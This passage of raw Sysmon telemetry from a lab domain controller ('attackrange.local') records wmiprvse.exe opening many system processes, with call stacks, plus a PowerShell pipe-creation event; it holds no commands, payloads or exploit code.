16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6FAA-00000000AD01}12376C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6FAA-00000000AD01}12376C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002236410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176\PSHost.132591775716089487.5176.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002236409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6FAA-00000000AD01}123767308C:\Windows\system32\conhost.exe{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.731{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+